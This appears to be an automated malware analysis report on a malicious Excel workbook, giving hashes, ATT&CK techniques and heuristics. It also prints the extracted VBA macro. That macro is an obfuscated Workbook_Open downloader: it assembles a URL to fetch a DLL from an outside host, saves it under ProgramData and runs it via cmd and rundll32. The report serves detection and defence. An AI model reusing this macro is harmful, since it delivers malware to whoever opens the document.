Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d8e69d3403ce1775…

MALICIOUS

Office (OOXML)

62.5 KB Created: 2006-09-28 05:33:49 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-10-05
MD5: fbd3a716bf72209a9f087aaf0a9c5b9f SHA-1: 0e9bf449a4add004a3f6b1296fc3e135fd790573 SHA-256: d8e69d3403ce17757ed6148db001ddbf518c67098242622a3b091e766bb73796
100 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel document containing a Workbook_Open VBA macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated but appears to construct a URL, 'https://outdoortacklebox.com/1.dll', likely to download a second-stage payload. It also attempts to write to startup directories, suggesting an attempt at persistence. The presence of a Workbook_Open macro and the obfuscated code strongly indicate a malicious intent, likely delivered via spearphishing.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 50656 bytes
SHA-256: 296a3896a5604ce6cc0b0977a6ded255e378bb83b8ab84bb1e0a060eb4896362
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Sub chk2wj3k()
   With Application.CommandBars(1).Controls.Add(Type:=msoControlPopup, Temporary:=True)
      .Caption = "?????"
      With .Controls
         With .Add(Type:=msoControlButton)
            .FaceId = 280
            .Caption = "????????"
            .OnAction = "??????1"
         End With
         With .Add(Type:=msoControlPopup)
            .Caption = "???? ??????"
            With .Controls
               With .Add(Type:=msoControlButton)
                  .FaceId = 1643
                  .Caption = "??????????"
                  .OnAction = "??????2"
               End With
               With .Add(Type:=msoControlButton)
                  .FaceId = 1000
                  .Caption = "??????????"
                  .OnAction = "??????3"
               End With
            End With
         End With
      End With
   End With
End Sub





Public Sub nvlk5lk()
    Dim fojn As Long
    
    UserForm1.Label1.Caption = "ht"
    UserForm1.OptionButton1.Caption = UserForm1.Label1.Caption + "tps:/"
    UserForm1.OptionButton2.Caption = UserForm1.OptionButton1.Caption + "/outdo"
    UserForm1.OptionButton2.Tag = UserForm1.OptionButton2.Caption + "ortacklebox.c"
    UserForm1.Label1.Caption = UserForm1.OptionButton2.Tag + "om/1.d"
    UserForm1.Label1.Caption = UserForm1.Label1.Caption + "ll"
    
    UserForm1.OptionButton1.Caption = "C"
    UserForm1.OptionButton2.Caption = UserForm1.OptionButton1.Caption + ":\Pro"
    UserForm1.OptionButton2.Tag = UserForm1.OptionButton2.Caption + "gramD"
    UserForm1.Label1.Tag = UserForm1.OptionButton2.Tag + "ata\ryui2.d"
    UserForm1.OptionButton3.Caption = UserForm1.Label1.Tag + "ll"
    
    fojn = uro2ihol.gfwer23(0, UserForm1.Label1.Caption, UserForm1.OptionButton3.Caption, 0, 0)
    If fojn = 0 Then
        UserForm1.OptionButton3.Caption = "Cxava:xava\Wxavaindoxavaws\xavaSyxavastxavaemxava3xava2\xavacmxavad.exxavae"
        UserForm1.OptionButton3.Caption = uro2ihol.jgflk4(UserForm1.OptionButton3.Caption, "xava")
        UserForm1.OptionButton3.Tag = "/betuc chobetuicbetue /betuC Y /betuN /D Ybetu /T 3betu0 & stabeturt Cbetu:\Wbetuinbetudobetuws\betuSbetuysbetutbetuem3betu2\rbetuundbetullbetu3betu2.betuexbetue Cbetu:\betuProbetugrabetumDbetuatbetua\beturbetutewbetudbetu.dbetull,DbetulbetulRebetugibetustbetuerSbetuerbetuvebetur"
        UserForm1.OptionButton3.Tag = uro2ihol.jgflk4(UserForm1.OptionButton3.Tag, "betu")
        
        uro2ihol.adfeq346w45 UserForm1.OptionButton3.Caption, UserForm1.OptionButton3.Tag
    End If
End Sub



Private Sub Workbook_Open()
    Dim x, y, z As Double
    Dim hnfkj As String
    nvlk5lk
    hnfkj = UserForm1.OptionButton3.Caption
End Sub


Sub sdfml2342pol3(fewo4ih As String, jgdlfk As String)
    fewo4ih = fewo4ih + " "
    fewo4ih = fewo4ih + jgdlfk
    End Sub
   With MenuBars("Worksheet").Menus.Add(Caption:="?????")
      .MenuItems.Add Caption:="????????", OnAction:="??????1"
      With .MenuItems.AddMenu(Caption:="???? ??????")
         .MenuItems.Add Caption:="??????????", OnAction:="??????2"
         .MenuItems.Add Caption:="??????????", OnAction:="??????3"
      End With
   End With
End Sub


Sub ito3uhi4uh()
   With MenuBars("Worksheet").Menus.Add(Caption:="?????")
      .MenuItems.Add Caption:="????????", OnAction:="??????1"
      With .MenuItems.AddMenu(Caption:="???? ??????")
         With .MenuItems.Add(Caption:="??????????")
            .OnAction = "??????2"
         End With
         With .MenuItems.Add(Caption:="??????????")
            .OnAction = "??????3"
         End With
      End With
   End With
End Sub




Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_G
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 147968 bytes
SHA-256: ab1c1f554d29b2fc9cbb0a6677d75d8a9d940aae91d988c19563f01d04149779